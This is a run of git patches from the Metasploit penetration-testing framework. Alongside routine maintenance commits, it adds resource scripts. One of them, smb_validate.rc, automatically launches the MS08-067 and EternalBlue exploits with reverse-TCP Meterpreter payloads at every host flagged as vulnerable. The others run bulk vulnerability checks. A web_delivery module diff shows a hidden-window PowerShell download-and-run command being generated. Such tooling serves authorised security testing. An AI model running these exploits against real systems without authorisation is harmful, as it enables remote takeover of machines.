a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -1443,14 +1443,9 @@ class Core session.response_timeout = response_timeout end begin - if ['shell', 'powershell'].include?(session.type) - session.init_ui(driver.input, driver.output) - session.execute_script('post/multi/manage/shell_to_meterpreter') - session.reset_ui - else - print_error("Session #{sess_id} is not a command shell session, it is #{session.type}, skipping...") - next - end + session.init_ui(driver.input, driver.output) + session.execute_script('post/multi/manage/shell_to_meterpreter') + session.reset_ui ensure if session.respond_to?(:response_timeout) && last_known_timeout session.response_timeout = last_known_timeout diff --git a/modules/post/multi/manage/shell_to_meterpreter.rb b/modules/post/multi/manage/shell_to_meterpreter.rb index fd865392db..1a69f54bd7 100644 --- a/modules/post/multi/manage/shell_to_meterpreter.rb +++ b/modules/post/multi/manage/shell_to_meterpreter.rb @@ -52,11 +52,6 @@ class MetasploitModule < Msf::Post def run print_status("Upgrading session ID: #{datastore['SESSION']}") - if session.type =~ /meterpreter/ - print_error("Shell is already Meterpreter.") - return nil - end - # Try hard to find a valid LHOST value in order to # make running 'sessions -u' as robust as possible. if datastore['LHOST'] From df14dc4452f02a14cb180a5b67ce26bb185e2d14 Mon Sep 17 00:00:00 2001 From: Maurice Popp Date: Mon, 23 Oct 2017 09:07:46 +0200 Subject: [PATCH 036/254] autodetection fixing --- modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index e93adff0a2..2af58a12f4 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -227,7 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit if target['auto'] - checkcode, self.target = fingerprint + checkcode, target = fingerprint fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' target_rop, target_overwrite, target_stack_align = ropchain(target) else From d8b2e7a13deb68d201de98f390e155d7f1a80658 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Tue, 24 Oct 2017 09:19:02 -0700 Subject: [PATCH 037/254] Add resource scripts to check & verify common SMB vulnerabilities This adds two resource scripts in order to check and verify common SMB vuns that Metasploit can do: * smb_checks.rc * smb_validate.rc --- scripts/resource/smb_checks.rc | 108 +++++++++++++++++++++ scripts/resource/smb_validate.rc | 157 +++++++++++++++++++++++++++++++ 2 files changed, 265 insertions(+) create mode 100644 scripts/resource/smb_checks.rc create mode 100644 scripts/resource/smb_validate.rc diff --git a/scripts/resource/smb_checks.rc b/scripts/resource/smb_checks.rc new file mode 100644 index 0000000000..ab2276f517 --- /dev/null +++ b/scripts/resource/smb_checks.rc @@ -0,0 +1,108 @@ + + +# +# This resource scripts will check common security concerns on SMB for Windows. +# Specifically, this script will check for these things: +# +# * MS08-067. +# * MS17-010. +# * SMB version 1. +# +# For extra validation, you may try the smb_validate.rc script. +# +# Author: +# sinn3r +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def check_ms17_010(host, serv) + print_status("Checking MS17-010 on #{host.address}") + mod = framework.modules.create('auxiliary/scanner/smb/smb_ms17_010') + mod.datastore['RHOSTS'] = host.address + mod.datastore['RPORT'] = serv.port + mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + print_status("MS17-010 job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id +end + +def check_ms08_067_netapi(host, serv) + print_status("Checking MS08-067 on #{host.address}") + mod = framework.exploits.create('windows/smb/ms08_067_netapi') + mod.datastore['RHOST'] = host.address + begin + check_code = mod.check_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + if mod.job_id + print_status("MS08-067 job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id + end + + if check_code == Msf::Exploit::CheckCode::Vulnerable + framework.db.report_vuln( + workspace: mod.workspace, + host: mod.rhost, + name: mod.name, + info: "This was flagged as vulnerable by the explicit check of #{mod.fullname}.", + refs: mod.references + ) + end + rescue ::Exception => e + print_error(e.message) + end +end + +def check_smbv1(host, serv) + print_status("Checking SMBv1 on #{host.address}") + mod = framework.modules.create('auxiliary/scanner/smb/smb1') + mod.datastore['RHOSTS'] = host.address + mod.datastore['RPORT'] = serv.port + mod.run_simple({ 'RunAsJob' => true, 'LocalOutput' => self.output }) + print_status("SMBv1 check job ID for target #{host.address} is: #{mod.job_id}") + @job_ids << mod.job_id +end + +def is_smb?(host, serv) + return false unless serv.host + return false if serv.state != Msf::ServiceState::Open + return false if serv.port != 445 + true +end + +def do_checks + print_status("Number of hosts to check: #{framework.db.workspace.hosts.length}") + framework.db.workspace.hosts.each do |host| + host.services.each do |serv| + next unless is_smb?(host, serv) + print_status("Checking #{host.address}:#{serv.port} (#{serv.name})") + check_smbv1(host, serv) + check_ms17_010(host, serv) + check_ms08_067_netapi(host, serv) + end + end +end + +def setup + run_single("setg verbose true") +end + +def main + print_status('Performing checks...') + do_checks + wait_until_jobs_done +end + +setup +main + + \ No newline at end of file diff --git a/scripts/resource/smb_validate.rc b/scripts/resource/smb_validate.rc new file mode 100644 index 0000000000..88332daf28 --- /dev/null +++ b/scripts/resource/smb_validate.rc @@ -0,0 +1,157 @@ + + +# +# This resource script will attempt to exploit the following vulnerabilities: +# +# * MS08-067 +# * MS17-010 +# +# It works best if you can pair it with the smb_checks.rc script. +# +# Author: +# sinn3r +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def ms08_067_netapi_mod + framework.exploits.create('windows/smb/ms08_067_netapi') +end + +def ms17_010_mod + framework.exploits.create('windows/smb/ms17_010_eternalblue') +end + +def is_port_open?(port) + begin + sock = Socket.new(Socket::Constants::AF_INET, Socket::Constants::SOCK_STREAM, 0) + sock.bind(Socket.pack_sockaddr_in(port, get_lhost)) + rescue + return false + ensure + sock.close if sock && sock.kind_of?(Socket) + end + + true +end + +def get_x86_meterpreter_port + port_range = (4000..65535) + port_range.each do |port| + return port if is_port_open?(port) + end + + raise RuntimeError, 'Unable to find a meterpreter port' +end + +def get_x64_meterpreter_port + port_range = (3000..65535) + port_range.each do |port| + return port if is_port_open?(port) + end + + raise RuntimeError, 'Unable to find a meterpreter port' +end + +def get_x86_payload_name + 'windows/meterpreter/reverse_tcp' +end + +def get_x64_payload_name + 'windows/x64/meterpreter/reverse_tcp' +end + +def get_lhost + framework.datastore['LHOST'] +end + +def validate_ms08_067(vuln) + mod = ms08_067_netapi_mod + mod.datastore['RHOST'] = vuln.host.address + mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 + mod.datastore['PAYLOAD'] = get_x86_ayload_name + mod.datastore['LHOST'] = get_lhost + mod.datastore['LPORT'] = get_x86_meterpreter_port + print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") + begin + mod.exploit_simple({ + 'LocalOutput' => self.output, + 'RunAsJob' => true, + 'Payload' => get_x86_payload_name + }) + @job_ids << mod.job_id + rescue ::Exception => e + print_error(e.message) + end +end + +def validate_ms17_010(vuln) + mod = ms17_010_mod + mod.datastore['RHOST'] = vuln.host.address + mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 + mod.datastore['PAYLOAD'] = get_x64_payload_name + mod.datastore['LHOST'] = get_lhost + mod.datastore['LPORT'] = get_x64_meterpreter_port + print_status("Validating MS17-010 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") + begin + mod.exploit_simple({ + 'LocalOutput' => self.output, + 'RunAsJob' => true, + 'Payload' => get_x64_payload_name + }) + @job_ids << mod.job_id + rescue ::Exception => e + print_error(e.message) + end +end + +def is_smb?(host, serv) + return false unless serv.host + return false if serv.state != Msf::ServiceState::Open + return false if serv.port != 445 + true +end + +def do_validation + framework.db.workspace.vulns.each do |vuln| + case vuln.name + when /MS17\-010/i + validate_ms17_010(vuln) + when /MS08\-067/i + validate_ms08_067(vuln) + end + end +end + +def setup + run_single("setg verbose true") +end + +def main + if framework.datastore['LHOST'] + print_status('Performing validation...') + begin + do_validation + wait_until_jobs_done + rescue RuntimeError => e + print_error(e.message) + print_error("Unable to do validation") + end + end +end + +setup +main + + \ No newline at end of file From 270ec2e9e6cb09d0cfbef6b399b5e6360b038cda Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Tue, 24 Oct 2017 16:39:01 -0500 Subject: [PATCH 038/254] Bump rex-socket to pick up better certs --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 934e2c31f6..572a93e651 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -288,7 +288,7 @@ GEM metasm rex-core rex-text - rex-socket (0.1.8) + rex-socket (0.1.9) rex-core rex-sslscan (0.1.5) rex-core From 80aba7264c725184d4c7583783163fbbafdbef27 Mon Sep 17 00:00:00 2001 From: RootUp Date: Wed, 25 Oct 2017 10:33:25 +0530 Subject: [PATCH 039/254] Update ibm_lotus_notes2.rb --- modules/auxiliary/dos/http/ibm_lotus_notes2.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb index aabd3b5041..4513c9dfda 100644 --- a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -23,7 +23,7 @@ class MetasploitModule < Msf::Auxiliary [ 'EXPLOIT-DB', '42604'], [ 'CVE', '2017-1130' ] ], - 'DisclosureDate' => 'August 31 2017', + 'DisclosureDate' => 'Aug 31 2017', 'Actions' => [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction' => 'WebServer' From c4c093b249d27ce7797cb07084f7f4c5384e9b3d Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 07:06:18 -0500 Subject: [PATCH 040/254] Method typo fix. --- scripts/resource/smb_validate.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/resource/smb_validate.rc b/scripts/resource/smb_validate.rc index 88332daf28..1df6c51c23 100644 --- a/scripts/resource/smb_validate.rc +++ b/scripts/resource/smb_validate.rc @@ -80,7 +80,7 @@ def validate_ms08_067(vuln) mod = ms08_067_netapi_mod mod.datastore['RHOST'] = vuln.host.address mod.datastore['RPORT'] = vuln.service ? vuln.service.port : 445 - mod.datastore['PAYLOAD'] = get_x86_ayload_name + mod.datastore['PAYLOAD'] = get_x86_payload_name mod.datastore['LHOST'] = get_lhost mod.datastore['LPORT'] = get_x86_meterpreter_port print_status("Validating MS08-067 on #{mod.datastore['RHOST']}:#{mod.datastore['RPORT']} with #{mod.datastore['PAYLOAD']} on port #{mod.datastore['LPORT']}") From 4fc0eb0cb3807defdc8f2a81ad6b30b34829ca6c Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 10:11:25 -0500 Subject: [PATCH 041/254] New resource script to check for development-related vulns. --- scripts/resource/dev_checks.rc | 118 +++++++++++++++++++++++++++++++++ 1 file changed, 118 insertions(+) create mode 100644 scripts/resource/dev_checks.rc diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc new file mode 100644 index 0000000000..24ecc52907 --- /dev/null +++ b/scripts/resource/dev_checks.rc @@ -0,0 +1,118 @@ + + +# +# This resource script will check for vulnerabilities related to +# programs and services used by developers, including the following: +# +# * NodeJS debug (multi/misc/nodejs_v8_debugger) +# * distcc (unix/misc/distcc_exe) +# * Jenkins (linux/misc/jenkins_java_deserialize) +# * GitHub Enterprise (linux/http/github_enterprise_secret) +# +# It is worth noting that ONLY CHECKS are performed, no active exploiting. +# This makes it safe to run in many environments. +# +# Author: +# pbarry-r7 +# + +@job_ids = [] + +def wait_until_jobs_done + while true + @job_ids.each do |job_id| + current_job_ids = framework.jobs.keys.map { |e| e.to_i } + sleep 1 if current_job_ids.include?(job_id) + end + + return + end +end + +def check_exploit(host:, mod_name:, vuln_check_ret_val:) + begin + mod = framework.exploits.create(mod_name) + mod.datastore['RHOST'] = host.address + print_line("Looking for #{mod.name}...") + result = mod.check_simple({'RunAsJob': true, 'LocalOutput': self.output}) + @job_ids << mod.job_id if mod.job_id + if vuln_check_ret_val.index(result) + print_line("HOST #{host.address} APPEARS VULNERABLE TO #{mod.name}") + framework.db.report_vuln( + workspace: mod.workspace, + host: mod.rhost, + name: mod.name, + info: "This was flagged as likely vulnerable by the explicit check of #{mod.fullname}.", + refs: mod.references + ) + end + rescue ::Exception => e + print_error(e.message) + end +end + +def setup + # Test and see if we have a database connected + begin + framework.db.hosts + rescue ::ActiveRecord::ConnectionNotEstablished + print_error("Database connection isn't established") + return false + end + + run_single("setg verbose true") + + true +end + +def main + framework.db.workspace.hosts.each do |host| + print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") + + check_exploit(host: host, + mod_name: 'multi/misc/nodejs_v8_debugger', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'unix/misc/distcc_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'unix/misc/qnx_qconn_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'linux/misc/jenkins_java_deserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'linux/http/github_enterprise_secret', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + + check_exploit(host: host, + mod_name: 'multi/http/traq_plugin_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'multi/http/builderengine_upload_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'multi/http/mantisbt_php_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'multi/http/vbulletin_unserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + + check_exploit(host: host, + mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + end + wait_until_jobs_done +end + +abort("Error during setup, exiting.") unless setup +main + + From 84686e1ab1ca35a20761278f50fb6cb4b75d31bd Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 11:41:14 -0500 Subject: [PATCH 042/254] Fix formatting. --- scripts/resource/dev_checks.rc | 41 +++++++++++++++++----------------- 1 file changed, 21 insertions(+), 20 deletions(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 24ecc52907..3d119410b1 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc @@ -70,45 +70,46 @@ def main print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") check_exploit(host: host, - mod_name: 'multi/misc/nodejs_v8_debugger', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/misc/nodejs_v8_debugger', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'unix/misc/distcc_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'unix/misc/distcc_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'unix/misc/qnx_qconn_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'unix/misc/qnx_qconn_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'linux/misc/jenkins_java_deserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'linux/misc/jenkins_java_deserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'linux/http/github_enterprise_secret', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) + mod_name: 'linux/http/github_enterprise_secret', + vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) check_exploit(host: host, - mod_name: 'multi/http/traq_plugin_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/traq_plugin_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'multi/http/builderengine_upload_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/builderengine_upload_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'multi/http/mantisbt_php_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/mantisbt_php_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'multi/http/vbulletin_unserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'multi/http/vbulletin_unserialize', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) check_exploit(host: host, - mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', + vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) end + wait_until_jobs_done end From 02a28395773e565329d017d9a36df0ba73fdb850 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 14:46:41 -0500 Subject: [PATCH 043/254] fix my comments from #8933 --- modules/exploits/multi/script/web_delivery.rb | 7 ++----- 1 file changed, 2 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 707f1ca524..c73bbff5f7 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -163,16 +163,13 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#{filename}')) # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file}) + download_string = Rex::Powershell::PshMethods.download_run(url, file) end download_and_run = "#{ignore_cert}#{download_string}" # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, - windowstyle: 'hidden', - command: download_and_run - ) + return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) end From a402686d7af268773ef39c9e29bb13e90679ae91 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 14:58:49 -0500 Subject: [PATCH 044/254] add missing spec for singles/python/shell_bind_tcp --- spec/modules/payloads_spec.rb | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/spec/modules/payloads_spec.rb b/spec/modules/payloads_spec.rb index 5fc0730837..0678c405ba 100644 --- a/spec/modules/payloads_spec.rb +++ b/spec/modules/payloads_spec.rb @@ -2370,6 +2370,16 @@ RSpec.describe 'modules/payloads', :content do reference_name: 'python/meterpreter_reverse_tcp' end + context 'python/shell_bind_tcp' do + it_should_behave_like 'payload cached size is consistent', + ancestor_reference_names: [ + 'singles/python/shell_bind_tcp' + ], + dynamic_size: false, + modules_pathname: modules_pathname, + reference_name: 'python/shell_bind_tcp' + end + context 'python/shell_reverse_tcp' do it_should_behave_like 'payload cached size is consistent', ancestor_reference_names: [ From 9961c70cda74e4a4b4a070dde52421caccf8df74 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 15:07:36 -0500 Subject: [PATCH 045/254] missing update to Gemfile.lock --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index 572a93e651..f1f9e72094 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -49,7 +49,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell (< 0.1.73) + rex-powershell (< 0.1.78) rex-random_identifier rex-registry rex-rop_builder From 43aac0ca5ef5dcae58fd58ceede56d695b0cfb81 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 15:39:23 -0500 Subject: [PATCH 046/254] PR feedback and add java module and scanner. --- scripts/resource/dev_checks.rc | 79 ++++++++++++++++------------------ 1 file changed, 36 insertions(+), 43 deletions(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 3d119410b1..538266fdd5 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc @@ -12,8 +12,9 @@ # It is worth noting that ONLY CHECKS are performed, no active exploiting. # This makes it safe to run in many environments. # -# Author: -# pbarry-r7 +# Authors: +# * pbarry-r7 +# * dmohanty-r7 # @job_ids = [] @@ -29,6 +30,17 @@ def wait_until_jobs_done end end +def run_scanner(host:, mod_name:) + begin + mod = framework.auxiliary.create(mod_name) + mod.datastore['RHOSTS'] = host.address + print_line("Running the #{mod.name}...") + result = mod.run_simple({'RunAsJob': true, 'LocalOutput': self.output}) + rescue ::Exception => e + print_error(e.message) + end +end + def check_exploit(host:, mod_name:, vuln_check_ret_val:) begin mod = framework.exploits.create(mod_name) @@ -53,9 +65,7 @@ end def setup # Test and see if we have a database connected - begin - framework.db.hosts - rescue ::ActiveRecord::ConnectionNotEstablished + if not (framework.db and framework.db.active) print_error("Database connection isn't established") return false end @@ -69,45 +79,28 @@ def main framework.db.workspace.hosts.each do |host| print_line("Checking IP: #{host.address}, OS: #{host.os_name}...") - check_exploit(host: host, - mod_name: 'multi/misc/nodejs_v8_debugger', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + # Modules + { 'multi/misc/nodejs_v8_debugger': [ Exploit::CheckCode::Appears ], + 'unix/misc/distcc_exec': [ Exploit::CheckCode::Vulnerable ], + 'unix/misc/qnx_qconn_exec': [ Exploit::CheckCode::Vulnerable ], + 'linux/misc/jenkins_java_deserialize': [ Exploit::CheckCode::Vulnerable ], + 'linux/http/github_enterprise_secret': [ Exploit::CheckCode::Vulnerable ], + 'multi/http/traq_plugin_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/builderengine_upload_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/mantisbt_php_exec': [ Exploit::CheckCode::Appears ], + 'multi/http/vbulletin_unserialize': [ Exploit::CheckCode::Appears ], + 'unix/webapp/vbulletin_vote_sqli_exec': [ Exploit::CheckCode::Appears ], + 'multi/misc/java_jmx_server': [ Exploit::CheckCode::Appears, + Exploit::CheckCode::Detected ] }.each do |mod,ret_val| + check_exploit(host: host, + mod_name: mod.to_s, + vuln_check_ret_val: ret_val) + end - check_exploit(host: host, - mod_name: 'unix/misc/distcc_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'unix/misc/qnx_qconn_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'linux/misc/jenkins_java_deserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'linux/http/github_enterprise_secret', - vuln_check_ret_val: [ Exploit::CheckCode::Vulnerable ]) - - check_exploit(host: host, - mod_name: 'multi/http/traq_plugin_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - check_exploit(host: host, - mod_name: 'multi/http/builderengine_upload_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - check_exploit(host: host, - mod_name: 'multi/http/mantisbt_php_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - check_exploit(host: host, - mod_name: 'multi/http/vbulletin_unserialize', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) - - check_exploit(host: host, - mod_name: 'unix/webapp/vbulletin_vote_sqli_exec', - vuln_check_ret_val: [ Exploit::CheckCode::Appears ]) + # Scanners + [ 'scanner/misc/java_rmi_server' ].each do |mod| + run_scanner(host: host, mod_name: mod.to_s) + end end wait_until_jobs_done From f458f214db54740ee30360641ae2dd2808ee03bd Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 15:43:25 -0500 Subject: [PATCH 047/254] Loop do, yo. --- scripts/resource/dev_checks.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 538266fdd5..99ded22aa7 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc @@ -20,7 +20,7 @@ @job_ids = [] def wait_until_jobs_done - while true + loop do @job_ids.each do |job_id| current_job_ids = framework.jobs.keys.map { |e| e.to_i } sleep 1 if current_job_ids.include?(job_id) From eb3f7f949ba367c6e4d415341dae8c78ba18cf82 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Wed, 25 Oct 2017 15:45:59 -0500 Subject: [PATCH 048/254] Fix formatting (again, sigh...). --- scripts/resource/dev_checks.rc | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/scripts/resource/dev_checks.rc b/scripts/resource/dev_checks.rc index 99ded22aa7..9cecf722d2 100644 --- a/scripts/resource/dev_checks.rc +++ b/scripts/resource/dev_checks.rc @@ -91,7 +91,7 @@ def main 'multi/http/vbulletin_unserialize': [ Exploit::CheckCode::Appears ], 'unix/webapp/vbulletin_vote_sqli_exec': [ Exploit::CheckCode::Appears ], 'multi/misc/java_jmx_server': [ Exploit::CheckCode::Appears, - Exploit::CheckCode::Detected ] }.each do |mod,ret_val| + Exploit::CheckCode::Detected ] }.each do |mod,ret_val| check_exploit(host: host, mod_name: mod.to_s, vuln_check_ret_val: ret_val) From 0a858cdaa9435695ee84c3081e3be5ee4b11c3d1 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:13:00 -0500 Subject: [PATCH 049/254] Revert "fix my comments from #8933" This reverts commit 02a28395773e565329d017d9a36df0ba73fdb850. --- modules/exploits/multi/script/web_delivery.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index c73bbff5f7..707f1ca524 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -163,13 +163,16 @@ class MetasploitModule < Msf::Exploit::Remote file = %Q(echo (#{path}+'\\#{filename}')) # Generate download PowerShell command - download_string = Rex::Powershell::PshMethods.download_run(url, file) + download_string = Rex::Powershell::PshMethods.download_run(url, file}) end download_and_run = "#{ignore_cert}#{download_string}" # Generate main PowerShell command - return generate_psh_command_line(noprofile: true, windowstyle: 'hidden', command: download_and_run) + return generate_psh_command_line(noprofile: true, + windowstyle: 'hidden', + command: download_and_run + ) end From 87d34bef6321ddea2530b126e930a3e32753c764 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:13:25 -0500 Subject: [PATCH 050/254] Revert "missing update to Gemfile.lock" This reverts commit 9961c70cda74e4a4b4a070dde52421caccf8df74. --- Gemfile.lock | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Gemfile.lock b/Gemfile.lock index f1f9e72094..572a93e651 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -49,7 +49,7 @@ PATH rex-mime rex-nop rex-ole - rex-powershell (< 0.1.78) + rex-powershell (< 0.1.73) rex-random_identifier rex-registry rex-rop_builder From ca28abf2a26e3e4e8d8ad7831191957842aea815 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Wed, 25 Oct 2017 16:19:14 -0500 Subject: [PATCH 051/254] Revert "Land #8933, Web_Delivery - Merge regsvr32_applocker_bypass_server & Add PSH(Binary)" This reverts commit 4999606b61a4f4a2542f51d94236cce2e953bfc3, reversing changes made to 4274b764737f094bf498d8e63e2d16f8fd5a603a. --- metasploit-framework.gemspec | 2 +- modules/exploits/multi/script/web_delivery.rb | 154 ++++-------------- .../misc/regsvr32_applocker_bypass_server.rb | 3 - 3 files changed, 35 insertions(+), 124 deletions(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 7bf217c2c3..6accc821ad 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -139,7 +139,7 @@ Gem::Specification.new do |spec| # Library for Generating Randomized strings valid as Identifiers such as variable names spec.add_runtime_dependency 'rex-random_identifier' # library for creating Powershell scripts for exploitation purposes - spec.add_runtime_dependency 'rex-powershell', ["< 0.1.78"] + spec.add_runtime_dependency 'rex-powershell', ["< 0.1.73"] # Library for processing and creating Zip compatbile archives spec.add_runtime_dependency 'rex-zip' # Library for parsing offline Windows Registry files diff --git a/modules/exploits/multi/script/web_delivery.rb b/modules/exploits/multi/script/web_delivery.rb index 707f1ca524..9adc1dacb4 100644 --- a/modules/exploits/multi/script/web_delivery.rb +++ b/modules/exploits/multi/script/web_delivery.rb @@ -8,7 +8,6 @@ require 'msf/core/exploit/powershell' class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking - include 